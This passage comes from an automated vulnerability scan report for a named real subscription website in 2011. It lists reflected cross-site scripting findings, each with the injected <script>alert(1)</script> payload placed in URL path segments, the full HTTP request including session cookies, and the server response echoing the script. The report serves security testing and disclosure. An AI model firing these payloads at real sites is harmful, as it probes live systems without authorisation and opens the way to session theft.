1.251. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e85ef<script>alert(1)</script>16b36c3d219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrole85ef<script>alert(1)</script>16b36c3d219/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:50 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole85ef<script>alert(1)</script>16b36c3d219/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575 is not found !</p>
...[SNIP]...

1.252. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 468b1<script>alert(1)</script>fbed0d930c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com468b1<script>alert(1)</script>fbed0d930c5/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:55 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com468b1<script>alert(1)</script>fbed0d930c5/Netsparkerd186b3ae09c841c6bee1f9d4f0873575 is not found !</p>
...[SNIP]...

1.253. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b548<script>alert(1)</script>b47fa40c880 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f08735755b548<script>alert(1)</script>b47fa40c880/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f08735755b548<script>alert(1)</script>b47fa40c880 is not found !</p>
...[SNIP]...

1.254. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b2ce<script>alert(1)</script>7b66258f47d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol5b2ce<script>alert(1)</script>7b66258f47d/www.newsweek.com/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:11 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 538
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol5b2ce<script>alert(1)</script>7b66258f47d/www.newsweek.com is not found !</p>
...[SNIP]...

1.255. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1302d<script>alert(1)</script>7752a5c6306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com1302d<script>alert(1)</script>7752a5c6306/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:12 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 790
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com1302d<script>alert(1)</script>7752a5c6306 is not found !</p>
...[SNIP]...

1.256. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98727<script>alert(1)</script>ba2def89b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol98727<script>alert(1)</script>ba2def89b1/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:12 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 580
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol98727<script>alert(1)</script>ba2def89b1/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b is not found !</p>
...[SNIP]...

1.257. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73dac<script>alert(1)</script>a919db1c8c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com73dac<script>alert(1)</script>a919db1c8c6/Netsparker3215122ba390411b8fddefdc9096119b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:21 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com73dac<script>alert(1)</script>a919db1c8c6/Netsparker3215122ba390411b8fddefdc9096119b is not found !</p>
...[SNIP]...

1.258. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 73aa5<script>alert(1)</script>159cfffc1a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b73aa5<script>alert(1)</script>159cfffc1a6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:50 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b73aa5<script>alert(1)</script>159cfffc1a6 is not found !</p>
...[SNIP]...

1.259. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd417<script>alert(1)</script>8687b1434a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolfd417<script>alert(1)</script>8687b1434a6/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 581
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolfd417<script>alert(1)</script>8687b1434a6/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325 is not found !</p>
...[SNIP]...

1.260. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c9ee<script>alert(1)</script>fe9c582639a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com4c9ee<script>alert(1)</script>fe9c582639a/Netsparker3488b5ca6f704b4db379c689563ca325/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:50 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com4c9ee<script>alert(1)</script>fe9c582639a/Netsparker3488b5ca6f704b4db379c689563ca325 is not found !</p>
...[SNIP]...

1.261. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a240<script>alert(1)</script>4405c536283 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca3255a240<script>alert(1)</script>4405c536283/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:03 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca3255a240<script>alert(1)</script>4405c536283 is not found !</p>
...[SNIP]...

1.262. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3f70<script>alert(1)</script>2b1e30bf4d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrolb3f70<script>alert(1)</script>2b1e30bf4d5/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 581
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolb3f70<script>alert(1)</script>2b1e30bf4d5/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 is not found !</p>
...[SNIP]...

1.263. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bcf6<script>alert(1)</script>7d65c73aa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.com5bcf6<script>alert(1)</script>7d65c73aa67/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:08 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com5bcf6<script>alert(1)</script>7d65c73aa67/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 is not found !</p>
...[SNIP]...

1.264. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9122d<script>alert(1)</script>09ba830a907 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b88589122d<script>alert(1)</script>09ba830a907 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 833
